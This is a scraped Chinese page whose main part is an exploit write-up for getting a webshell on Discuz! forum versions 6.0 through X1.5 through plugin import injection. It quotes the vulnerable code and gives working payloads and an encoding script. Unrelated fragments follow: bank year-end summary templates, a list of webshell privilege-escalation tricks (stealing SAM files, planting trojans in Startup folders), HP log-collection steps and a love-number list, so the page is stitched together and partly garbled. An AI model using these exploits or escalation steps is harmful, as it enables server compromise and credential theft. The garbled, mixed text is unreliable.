Discuz!各版本拿Webshell

四个版本的漏洞， Discuz! 6.0 、7.0、7.2和X1.5。

传X1.5出0day，最后神马也木见……

/include/cache.func.php

PHP代码

function writetocache($script, $cachenames, $cachedata = ”, $prefix = ‘cache_’) {

global $authkey;

if(is_array($cachenames) && !$cachedata) {

foreach($cachenames as $name) {

$cachedata .= getcachearray($name, $script); }

}

$dir = DISCUZ_ROOT.’./forumdata/cache/’;

if(!is_dir($dir)) {

@mkdir($dir, 0777);

}

if($fp = @fopen(“$dir$prefix$script.php”, ‘wb’)) {

fwrite($fp, “

“\n//Created: “.date(“M j, Y, G:i”).

“\n//Identify:

“.md5($prefix.$script.’.php’.$cachedata.$authkey).”\n\n$cachedata ?>”);

fclose($fp);

} else {

exit(‘Can not write to cache files, please check directory ./forumdata/ and ./forumdata/cache/ .’);

}

}

————往上翻,找到调用函数的地方.都在updatecache函数中.

PHP代码

if(!$cachename || $cachename == ‘plugins’) {

$query = $db->query(“SELECT pluginid, available, adminid, name, identifier, datatables, directory, copyright, modules FROM {$tablepre}plugins”);

while($plugin = $db->fetch_array($query)) {

$data = array_merge($plugin, array(‘modules’ => array()), array(‘vars’ => array()));

$plugin['modules'] =

unserialize($plugin['modules']);

if(is_array($plugin['modules'])) {

foreach($plugin['modules'] as $module) { $data['modules'][$module['name']] = $module;

}

}

$queryvars = $db->query(“S ELECT variable, value FROM {$tablepre}pluginvars WHERE pluginid=’$plugin[pluginid]‘”);

while($var = $db->fetch_array($queryvars)) {

$data['vars'][$var['variable']] =

$var['value'];

}

//注意

writetocache($plugin['identifier'], ”,

“\$_DPLUGIN['$plugin[identifier]‘] = “.arrayeval($data),

‘plugin_’);

}

}

——————如果我们可以控制$plugin['identifier']就有机会,它是plugins表里读出来的.去后台看看,你可以发现identifier对应的是唯一标示符.联想下二次注射,单引号从数据库读出后写入文件时不会被转义.贱笑一下.但是……你懂的,当你去野区单抓对面DPS时,发现对面蹲了4 个敌人的心情. /admin/plugins.inc.php

PHP代码

if(($newname = trim($newname)) || ($newidentifier =

trim($newidentifier))) {

if(!$newname) {

cpmsg(‘plugins_edit_name_invalid’);

}

$query = $db->query(“SELECT pluginid FROM {$tablepre}plugins WHERE identifier=’$newidentifier’ LIMIT 1″);

欲裂,ispluginkey判定newidentifier是否有特殊字符

if($db->num_rows($query) || !$newidentifier

|| !ispluginkey($newidentifier)) {

cpmsg(‘plugins_edit_identifier_invalid’);

}

$db->query(“INSERT INTO {$tablepre}plugins (name, identifier, available) VALUES (‘”.dhtmlspecialchars(trim($newname)).”‘,

‘$newidentifier’, ’0′)”);

}

updatecache(‘plugins’);

updatecache(‘settings’);

cpmsg(‘plugins_edit_succeed’,

‘admincp.php?action=pluginsconfig’);

—————还好Discuz!提供了导入的功能,好比你有隐身,对面没粉.你有疾风步,对面没控.好歹给咱留条活路.

PHP代码

elseif(submitcheck(‘importsubmit’)) {

$plugindata = preg_replace(“/(#.*\s+)*/”, ”, $plugindata);

$pluginarray =

daddslashes(unserialize(base64_decode($plugindata)), 1);

//解码后没有判定

if(!is_array($pluginarray)

|| !is_array($pluginarray['plugin'])) {

cpmsg(‘plugins_import_data_invalid’);

} elseif(emptyempty($ignoreversion) &&

strip_tags($pluginarray['version']) != strip_tags($version)) {

cpmsg(‘plugins_import_version_invalid’);

}

$query = $db->query(“SELECT pluginid FROM {$tablepre}plugins WHERE

identifier=’{$pluginarray[plugin][identifier]}’ LIMIT 1″);

//判断是否重复,直接入库

if($db->num_rows($query)) {

cpmsg(‘plugins_import_identifier_duplicated ’);

}

$sql1 = $sql2 = $comma = ”;

foreach($pluginarray['plugin'] as $key => $val) {

if($key == ‘directory’) {

//compatible for old versions

$val .= (!emptyempty($val) &&

substr($val, -1) != ‘/’) ? ‘/’ : ”;

}

$sql1 .= $comma.$key;

$sql2 .= $comma.’\”.$val.’\”;

$comma = ‘,’;

}

$db->query(“INSERT INTO {$tablepre}plugins ($sql1) VALUES ($sql2)”);

$pluginid = $db->insert_id();

foreach(array(‘hooks’, ‘vars’) as $pluginconfig) {

if(is_array($pluginarray[$pluginconfig])) { foreach($pluginarray[$pluginconfig]

as $config) {

$sql1 = ‘pluginid’;

$sql2 =

‘\”.$pluginid.’\”;

foreach($config as $key => $val) {

$sql1 .= ‘,’.$key;

$sql2 .=

‘,\”.$val.’\”;

}

$db->query(“INSERT INTO {$tablepre}plugin$pluginconfig ($sql1) VALUES ($sql2)”);

}

}

}

updatecache(‘plugins’);

updatecache(‘settings’);

cpmsg(‘plugins_import_succeed’,

‘admincp.php?action=pluginsconfig’);

}

————-随便新建一个插件,identifier为shell,生成文件路径及内容.然后

导出备用./forumdata/cache/plugin_shell.php

PHP代码

//Discuz! cache file, DO NOT modify me!

//Created: Mar 17, 2011, 16:56

//Identify: 7c0b5adeadf5a806292d45c64bd0659c

$_DPLUGIN['shell'] = array (

‘pluginid’ => ’11′,

‘available’ => ’0′,

‘adminid’ => ’0′,

‘name’ => ‘Getshell’,

‘identifier’ => ‘shell’,

‘datatables’ => ”,

‘directory’ => ”,

‘copyright’ => ”,

‘modules’ =>

array (

),

‘vars’ =>

array (

),

)?>

———–我们可以输入任意数据,唯一要注意的是文件名的合法性.感谢微软,下面的文件名是合法的：forumdata/cache/plugin_a’]=phpinfo();$a['a.php PHP代码

//Discuz! cache file, DO NOT modify me!

//Created: Mar 17, 2011, 16:56

//Identify: 7c0b5adeadf5a806292d45c64bd0659c

$_DPLUGIN['a']=phpinfo();$a['a'] = array (

‘pluginid’ => ’11′,

‘available’ => ’0′,

‘adminid’ => ’0′,

‘name’ => ‘Getshell’,

‘identifier’ => ‘shell’,

‘datatables’ => ”,

‘directory’ => ”,

‘copyright’ => ”,

‘modules’ =>

array (

),

‘vars’ =>

array (

),

)?>

————–最后是编码一次,给成Exp:

PHP代码

$a =

unserialize(base64_decode(“YToyOntzOjY6InBsdWdpbiI7YTo5OntzOjk6ImF2Y WlsYWJsZSI7czoxOiIw

IjtzOjc6ImFkbWluaWQiO3M6MToiMCI7czo0OiJuYW1lIjtzOjg6IkdldHNo

ZWxsIjtzOjEwOiJpZGVudGlmaWVyIjtzOjU6IlNoZWxsIjtzOjExOiJkZXNj cmlwdGlvbiI7czowOiIiO3M6MTA6ImRhdGF0YWJsZXMiO3M6MDoiIjtzOjk6 ImRpcmVjdG9yeSI7czowOiIiO3M6OToiY29weXJpZ2h0IjtzOjA6IiI7czo3

OiJtb2R1bGVzIjtzOjA6IiI7fXM6NzoidmVyc2lvbiI7czo1OiI2LjAuMCI7

fQ==”));

//print_r($a);

$a['plugin']['name']=’GetShell’;

$a['plugin']['identifier']=’a\’]=phpinfo();$a[\'';

print(base64_encode(serialize($a)));

?>

7.0同理,大家可以自己去测试咯.如果你使用上面的代码,请勾选"允许导入不同版本 Discuz! 的插件"

-------------------------------------------------------------------------------------

二、Discuz! 7.2 和 Discuz! X1.5

以下以7.2为例，/admin/plugins.inc.php

PHP代码

elseif($operation == 'import') {

if(!submitcheck('importsubmit') && !isset($dir)) {

/*未提交前表单神马的*/

} else {

if(!isset($dir)) {

//导入数据解码

$pluginarray = getimportdata('Discuz!

Plugin');

} elseif(!isset($installtype)) {

/*省略一部分*/

}

//判定你妹啊,两遍啊两遍

if(!ispluginkey($pluginarray['plugin']['identifier'])) {

cpmsg(‘plugins_edit_identifier_invalid’, ”, ‘error’);

}

if(!ispluginkey($pluginarray['plugin']['identifier'])) {

cpmsg(‘plugins_edit_identifier_invalid’, ”, ‘error’);

}

if(is_array($pluginarray['hooks'])) {

foreach($pluginarray['hooks'] as $config) { if(!ispluginkey($config['title'])) {

cpmsg(‘plugins_import_hooks_ title_invalid’, ”, ‘error’);

}

}

}

if(is_array($pluginarray['vars'])) {

foreach($pluginarray['vars'] as $config) {

if(!ispluginkey($config['variable'])) {

cpmsg(‘plugins_import_var_in valid’, ”, ‘error’);

}

}

}

$langexists = FALSE;

//你有张良计,我有过墙梯

if(!emptyempty($pluginarray['language'])) {

@mkdir(‘./forumdata/plugins/’, 0777);

$file =

DISCUZ_ROOT.’./forumdata/plugins/’.$pluginarray['plugin']['identifi

er'].’.lang.php’;

if($fp = @fopen($file, ‘wb’)) {

$scriptlangstr

= !emptyempty($pluginarray['language']['scriptlang']) ?

“\$scriptlang['".$pluginarray['plugin']['id entifier'].”‘] =

“.langeval($pluginarray['language']['scriptlang']) : ”;

$templatelangstr

= !emptyempty($pluginarray['language']['templatelang']) ?

“\$templatelang['".$pluginarray['plugin']['identifier'].”‘] =

“.langeval($pluginarray['language']['templatelang']) : ”;

$installlangstr

= !emptyempty($pluginarray['language']['installlang']) ?

“\$installlang['".$pluginarray['plugin']['identifier'].”‘] =

“.langeval($pluginarray['language']['installlang']) : ”;

fwrite($fp,

“’); fclose($fp);

}

$langexists = TRUE;

}

/*处理神马的*/

updatecache(‘plugins’);

updatecache(‘settings’);

updatemenu();

/*省略部分代码*/

}

———————–先看导入数据的过程,Discuz! 7.2之后的导入数据使用XML,但是7.2保持了向下兼容.X1.5废弃了.

PHP代码

function getimportdata($name = ”, $addslashes = 1, $ignoreerror = 0) { if($GLOBALS['importtype'] == ‘file’) {

$data = @implode(”,

file($_FILES['importfile']['tmp_name']));

@unlink($_FILES['importfile']['tmp_name']);

} else {

$data = $_POST['importtxt'] && MAGIC_QUOTES_GPC ? stripslashes($_POST['importtxt']) : $GLOBALS['importtxt'];

}

include_once DISCUZ_ROOT.’./include/xml.class.php’;

$xmldata = xml2array($data);

if(!is_array($xmldata) || !$xmldata) {

//向下兼容

if($name && !strexists($data, ‘# ‘.$name)) {

if(!$ignoreerror) {

cpmsg(‘import_data_typeinvalid’, ”, ‘error’);

} else {

return array();

}

}

$data = preg_replace(“/(#.*\s+)*/”, ”, $data);

$data = unserialize(base64_decode($data));

if(!is_array($data) || !$data) {

if(!$ignoreerror) {

cpmsg(‘import_data_invalid’, ”,

‘error’);

} else {

return array();

}

}

} else {

//XML解析

if($name && $name != $xmldata['Title']) {

if(!$ignoreerror) {

cpmsg(‘import_data_typeinvalid’, ”, ‘error’);

} else {

return array();

}

}

$data = exportarray($xmldata['Data'], 0);

}

if($addslashes) {

//daddslashes在两个版本的处理导致了Exp不能通用.

$data = daddslashes($data, 1);

}

return $data;

}

——————判定了identifier之后,7.0版本之前的漏洞就不存在了.但是它

又加入了语言包。我们只要控制scriptlangstr或者其它任何一个就可以了。PHP代码

function langeval($array) {

$return = ”;

foreach($array as $k => $v) {

//Key过滤了单引号,但是只过滤了单引号,可以利用\废掉后面的单引号

$k = str_replace(“‘”, ”, $k);

//下面的你绝对看不懂啊看不懂,你到底要人家怎么样嘛?你对\有爱?

$return .= “\t’$k’ =>

‘”.str_replace(array(“\\’“, “‘”), array(“\\\’“, “\’”), stripslashes($v)).”‘,\n”;

}

return “array(\n$return);\n\n”;

}

—————————–Key这里不通用.

—————7.2版本如下

PHP代码

function daddslashes($string, $force = 0) {

!defined(‘MAGIC_QUOTES_GPC’) && define(‘MAGIC_QUOTES_GPC’, get_magic_quotes_gpc());

if(!MAGIC_QUOTES_GPC || $force) {

if(is_array($string)) {

foreach($string as $key => $val) {

$string[$key] = daddslashes($val, $force);

}

} else {

$string = addslashes($string);

}

}

return $string;

}

———————1.5版本如下

PHP代码

function daddslashes($string, $force = 1) {

if(is_array($string)) {

foreach($string as $key => $val) {

unset($string[$key]);

//过滤了key

$string[addslashes($key)] = daddslashes($val, $force);

}

} else {

$string = addslashes($string);

}

return $string;

}

———————-还是看下https://www.sodocs.net/doc/e72668042.html,ng.php的文件格式.

PHP代码

$scriptlang['shell'] = array(

‘a’ => ’1′,

‘b’ => ’2′,

);

?>

————————7.2版本没有过滤Key,所以直接用\废掉单引号.X1.5,单引号转义后变为\’,再被替换一次’,还是留下了\而$v在两个版本中过滤相同,比较通用.X1.5至少副站长才可以管理后台,虽然看不到插件选项,但是可以直接访问/admin.php?frames=yes& action=plugins添加插件

————————–通用Exp:

PHP代码

href="http://localhost/Discuz_7.2_SC_UTF8/upload/%29%5D%5D%3E%3C/item %E2%80%9D%3Ehttp://localhost/Discuz_7.2_SC_UTF8/upload/%29%5D%5D%3E%3 C/item%3C/a%3E%3E%C2%A0%3Cbr%20/%3E%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2% A0%C2%A0%20%3Citem%20id=%E2%80%9DData%E2%80%9D%3E%C2%A0%3Cbr%20/%3E%C 2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A 0%C2%A0%C2%A0%C2%A0%20%3Citem%20id=%E2%80%9Dplugin%E2%80%9D%3E%C2%A0% 3Cbr%20/%3E%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2% A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0% C2%A0%C2%A0%20%3Citem%20id=%E2%80%9Davailable%E2%80%9D%3E%3C%21%5BCDA TA%5B0%5D%5D%3E%3C/item%3E%C2%A0%3Cbr%20/%3E%C2%A0%C2%A0%C2%A0%C2%A0% C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2% A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%20%3Citem%20id=%E2%80%9D adminid%E2%80%9D%3E%3C%21%5BCDATA%5B0%5D%5D%3E%3C/item%3E%C2%A0%3Cbr% 20/%3E%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2

%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0 %C2%A0%20%3Citem%20id=%E2%80%9Dname%E2%80%9D%3E%3C%21%5BCDATA%5Bwww%5 D%5D%3E%3C/item%3E%C2%A0%3Cbr%20/%3E%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2 %A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%20%3Citem%20id=%E2%80%9Didentifi er%E2%80%9D%3E%3C%21%5BCDATA%5Bshell%5D%5D%3E%3C/item%3E%C2%A0%3Cbr%2 0/%3E%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2% A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0% C2%A0%20%3Citem%20id=%E2%80%9Ddescription%E2%80%9D%3E%3C%21%5BCDATA%5 B%5D%5D%3E%3C/item%3E%C2%A0%3Cbr%20/%3E%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2 %A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%20%3Citem%20id=%E2%80%9Ddatat ables%E2%80%9D%3E%3C%21%5BCDATA%5B%5D%5D%3E%3C/item%3E%C2%A0%3Cbr%20/ %3E%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2 %A0%20%3Citem%20id=%E2%80%9Ddirectory%E2%80%9D%3E%3C%21%5BCDATA%5B%5D %5D%3E%3C/item%3E%C2%A0%3Cbr%20/%3E%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2% A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0% C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%20%3Citem%20id=%E2%80%9Dcopyright %E2%80%9D%3E%3C%21%5BCDATA%5B%5D%5D%3E%3C/item%3E%C2%A0%3Cbr%20/%3E%C 2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A 0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%2 0%3Citem%20id=%E2%80%9Dmodules%E2%80%9D%3E%3C%21%5BCDATA%5Ba:0:%7B%7D %5D%5D%3E%3C/item%3E%C2%A0%3Cbr%20/%3E%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0% C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2% A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%20%3Citem%20id=%E2%80%9Dversio n%E2%80%9D%3E%3C%21%5BCDATA%5B%5D%5D%3E%3C/item%3E%C2%A0%3Cbr%20/%3E% C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2% A0%C2%A0%C2%A0%C2%A0%20%3C/item%3E%C2%A0%3Cbr%20/%3E%C2%A0%C2%A0%C2%A 0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C 2%A0%20%3Citem%20id=%E2%80%9Dversion%E2%80%9D%3E%3C%21%5BCDATA%5B7.2% 5D%5D%3E%3C/item%3E%C2%A0%3Cbr%20/%3E%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C 2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%20%3Citem% 20id=%E2%80%9Dlanguage%E2%80%9D%3E%C2%A0%3Cbr%20/%3E%C2%A0%C2%A0%C2%A 0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C 2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%20%3Citem%20id=% E2%80%9Dscriptlang%E2%80%9D%3E%C2%A0%3Cbr%20/%3E%C2%A0%C2%A0%C2%A0%C2 %A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2 %A0%C2%A0%C2%A0%C2%A0%C2%A0%20%3Citem%20id=%E2%80%9Da%E2%80%9D%3E%3C% 21%5BCDATA%5Bb/%5D%5D%3E%3C/item%3E%C2%A0%3Cbr%20/%3E%C2%A0%C2%A0%C2% A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0% C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%C2% A0%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0%20%3Citem%20id=%E2%80%9D%29;phpinfo%

28%29;?%3E%E2%80%9D%3E%3C%21[CDATA[x]]%3E%3C/item%3E%C2%A0%3Cbr%20/%3 E%C2%A0%C2%A0%C2%A0%C2%A0%C2%A0">http://localhost/Discuz_7.2_SC_UTF8/ upload/)]]>

id=”identifier”>

id=”modules”>

id=”a\”>1);phpinfo();?>]]>

————————————-x1.5

PHP代码

(http://localhost/Discuz_7.2_SC_UTF8/upload/)]]>

id=”identifier”>

id=”modules”>

id=”a’”>1);phpinfo();?>]]>

—–

如果你愿意,可以使用base64_encode(serialize($a))的方法试试7.2获取Webshell.

银行后台员工年终总结怎么写

银行后台员工年终总结怎么写 银行后台员工年终总结1 20__年已过去，在新的1年中，我会1直保持“空杯心态”，虚心学习，继续努力，在今后的工作中，我还应努力做好以下几点： 1、建立爱岗敬业、忘我奉献的精神 比尔·盖茨说过这样1句话：“每天凌晨醒来，1想到所从事的工作和所开发的技术将会给人类生活带来的巨大影响和变化，我就会非常兴奋和激动。”那末是甚么成绩了他的事业?又是甚么创造了他的财富?是责任与豪情!我认为责任是1种人生态度，是珍视未来、爱岗敬业的表现，而豪情则是责任心的完善体现，它是成绩事业的强大气力，这份气力给予了我们充足的动力和勇气，让我们走在岗位的前列，为我们创造出1流的事迹，更加我们构筑了和谐的企业。责任增进发展，豪情成绩事业，我将从身旁的小事做起，从现在做起，将责任扛上双肩，将豪情填满我的工作，奋力拼搏，收获更多的精彩和奇迹! 2、加强业务知识学习、提升合规操作意识 身为网点1线员工，切实提高业务素质和风险防范能力，全面加强柜面营销和柜台服务，是我们临柜人员最为实际的工作任务，起着沟通顾客与银行的桥梁作用。因此，在临柜工作中，坚持要做1个“有心人”。 “没有规矩何成方圆”，加强合规操作意识，其实不是1句挂在嘴边的空话。有时，总是觉得有的规章制度在束缚着我们业务的办理，在制约着我们的业务发展，细细想来，其实不然，各项规章制度的建立，不是平空想象出来产物，而是在经历过许许多多实际工作经验教训总结出来的，只有依照各项规章制度办事，我们才有保护自

已的权益和保护广大客户的权益能力。 3、增强规章制度的履行与监督防范案件意识 规章制度的履行与否，取决于员工对各项规章制度的苏醒认识与熟练掌握程度，有规不遵，有章不遁是各行业之大忌，车行千里始有道，对规章制度的履行，就1线柜员而言，从内部讲要做到从我做起，正确办理每笔业务，认真审核每张票据，监督授权业务的合法合规，严格履行业务操作系统安全防范，抵制各种背规作业等等，做好相互制约，相互监督，不能碍于同事情面或片面寻求经济效益而背离规章制度而不顾。坚持至始至终地按规章办事。如此以来，我们的制度才得于实行，我们的资金安全防范才有保障。再好的制度，如果不能得到好的履行，那也将走向它的反面。 我相信，机遇总是垂青有准备的人，毕生学习才能不断创新。知识造就人材，岗位成绩梦想。有1种事业，需要青春和理想去寻求，有1种寻求需要付出艰辛的劳动和辛苦的汗水，我愿我所从事的招商银行永久年轻和壮丽，兴旺和发达! 银行后台员工年终总结2 由于领导的栽培和信任，我有幸在春节之前加入到___工作中来，自从进入___以来，在部门领导和老同志的关心、帮助下，努力做到爱岗敬业，恪尽职守，以务实的工作风格、坚定的思想信心和饱满的工作热忱，较好地完成了自己的本职工作和领导交办的各项工作。现简单总结： 1、努力改造思想，做好角色转变。由于我之前1直从事_ 工作，这是第1次接触管理的工作，这其中有个角色的转变，虽然_工作使我更加熟习我厂的技术参数、经济指标等，为以后的工作打下了良好的基础，但由于_工作的性质，使我在工作中养成了被动接受、

最全的WEBSHELL提权大大全

WEBSHELL权限提升技巧 c: d: e:..... C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转，我们从这里可以获取好多有用的信息比如Serv-U的路径， C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录，如果行那就最好了，直接下它的CIF文件，破解得到pcAnywhere 密码，登陆 c:\Program Files\serv-u\ C:\WINNT\system32\config\ 下它的SAM，破解密码 c:\winnt\system32\inetsrv\data\ 是erveryone 完全控制，很多时候没作限制，把提升权限的工具上传上去，然后执行 c:\prel C:\Program Files\Java Web Start\ c:\Documents and Settings\ C:\Documents and Settings\All Users\ c:\winnt\system32\inetsrv\data\ c:\Program Files\ c:\Program Files\serv-u\ C:\Program Files\Microsoft SQL Server\ c:\Temp\ c:\mysql\(如果服务器支持PHP） c:\PHP(如果服务器支持PHP） 运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限 还可以用这段代码试提升，好象不是很理想的 如果主机设置很变态，可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat，vbs等木马。 根目录下隐藏autorun.inf C:\PROGRAM FILES\KV2004\ 绑 D:\PROGRAM FILES\RISING\RAV\ C:\Program Files\Real\RealServer\ rar Folder.htt与desktop.ini 将改写的Folder.htt与desktop.ini，还有你的木马或者是VBS或者是什么，放到对方管理员最可能浏览的目录下 replace 替换法捆绑 脚本编写一个启动/关机脚本重起 删SAM 错 CAcls命令 FlashFXP文件夹Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak Ring的权限提升21大法！ 以下全部是本人提权时候的总结很多方法至今没有机会试验也没有成功，但是我是的确看见别人成功过

系统下收集日志方法

收集日志操作如下： HPS 1、将附件HPSRPT_Enhanced_v9.0.00r2.zip 文件copy到目标服务器，存放在c:\ 2、解压到当前文件夹后双击运行HPSRPT_Enhanced_v9.0.00r2.cmd文件 3、不要关闭DOS运行窗口大约15分钟左右会自动消失说明运行完成。 4、完成后需要到C:\WINDOWS\HPSReports\Enhanced\Report\cab 目录下查看生成文件信息 5、收集对应时间点的cab文件即可。 第一个日志：ADU报告 2、打开开始——程序——HP System Tools——HP Array Configuration Utility——HP Array Configuration Utility。

3、选择Local Applcation Mode，本地应用模式。 4、打开了HP Array Configuration Utility工具后，点中间的Diagnostics选项卡，选中左侧的

阵列卡，右侧会出现2个按钮，查看和提取日志报告，我们选择Generate Diagnostic Report。 5、提示Reprot Generation Complete日志提取完毕，这时可以选择右下角Save report按钮。

6、选择保存，弹出保存菜单，点保存。 7、可以选择保存到桌面上。

第二个报告：survey报告 打开开始——程序——HP System Tools——HP Insight Diagnostics online Edition for Windows ——HP Insight Diagnostics online Edition for Windows。 9、提示安全证书报警，选择是，继续。

银行营业部的年终工作总结

银行营业部的年终工作总结 200x年在行长室的领导下，各部门的帮助配合下，我们营业部全体员工认真学习、贯彻和落实各项规章制度。围绕市分行提出的“xxxxxx”，以服务工作为中心，结合营业部的工作实际，充分发挥营业部的服务窗口形象，做好全行的会计结算业务，为我行的全年工作做一份努力。 一、做好日常的服务结算工作 做为支行营业部，是一个大型综合网点，既是对外服务窗口，又是全行的业务处理中心，我们认为最重要的就是做好日常的业务处理，对外做好服务工作，对内做好结算工作。 1、节前节后是大量的现金投放与回笼，春节前为满足客户对现金的需要，从人民银行取2款1。5亿，春节一过，又向人民银行回笼了6500万现金。 2、对每年二次的学校收费我们在人员上、业务上给予最大的配合，对收回的现金及时清点入库，并及时开出行政事业收收费发票交回学校，将款项及时划入财政。 3、做好春节及5。1节期间的业务员、管库员及网点的安全保卫工作，考虑到营业部人员比以往减少，在节前即通知各网点要求做好入库钱钞的标准质量，以加快回笼资金的入库，减少

库存。 4、参加xxx大型演唱会的门票出售收款工作，并按排好相关的各项工作，保证在此期间的资金人员安全。 5、上半年协调三个部门做好网上银行的安装工作，并对相关企业进行业务及电脑知识上的培训，努力减少睡眠户的产生。至下半年，为更好地开展电子银行业务，在行长室关心下由营业部与公司业务部负责电子银行的安装服务工作，除了安装与业务知识宣传外，我们更做好对电子银行业务的落地处理工作，一年来未发生有任何的重复、错划或漏划等差错。 6、做好nova1。2、1。3、1。4版本的前期测试及投产工作。 7、配合xx支行做好对xx公司售房款的接款及清点工作。 8、做好本外币帐户清理及结转工作，在11月完成了帐务上收工作，同时在12月底我们成功完成与外管局的信息核对与纠错工作。 9、对电信及中油公司、石油公司的帐户信息调整工作（调为集团帐户）。 10、应电信局的邀请，由xxx对电信局全辖的出纳人员进行假币培训。 11、代理业务处理从个人业务部转到营业部处理，并将全

爱情数字密码

爱情数字密码 导读：爱情语录爱情数字密码 1、53881：我想抱抱你 2、74520：其实我爱你 3、7418695：其实你不了解我 4、359258：想我就爱我吧 5、5452830：无时无刻不想你 6、3207778：想和你去吹吹风 7、515206：我已不爱你了 8、825：别爱我 9、987：对不起 10、584520：我發誓我愛你 11、912：就要爱 12、2406：爱死你啦 13、520：我爱你 14、7708801314520：亲亲你抱抱你一生一世我爱你 15、35911：想我久一点 16、809：保齡球 17、99113148875：求求你一生一世别抛弃我 18、756：亲我啦 19、319421：想你就是爱你 20、9213：钟爱一生

21、01925：你依旧爱我 22、70626：请你留下来 23、246：饿死了 24、21184：爱你一辈子 25、3344520：生生世世我愛你 26、220225：爱爱你爱爱我 27、04527：你是我爱妻 28、282：饿不饿 29、2131999：爱你想你久久久 30、21863：爱你到来生 31、59420：我就是爱你 32、0837：你别生气 33、310：先依你 34、259758：爱我就娶我吧 35、369958：神啊救救我吧 36、9958520：救救我吧，我爱你 37、3344587：生生世世不变心 38、53406：我想死你了 39、918：加油吧 40、706519184：请你让我依靠一辈子 41、5620：我很爱你 42、7408695：其实你不了解我

43、174：你去死 44、03456：你相思无用 45、920：就爱你 46、7752：亲亲吾爱 47、8113：伴你一生 48、70885：请你帮帮我 49、0532：你我深爱 50、211701：爱你一千年 51、737420：今生今世爱你 52、73817：情深怕缘浅 53、07868：你吃饱了吗 54、25910：爱我久一点 55、564335：无聊时想想我 56、296：爱走了 57、917：就要亲 58、5420：我只爱你 59、0437：你是神经 60、2031999：爱你想你久久久 61、73807：情深怕缘浅 62、81176：不要在一起了 63、1240：最爱是你 64、85941：帮我告诉他

日志管理与分析-日志收集及来源

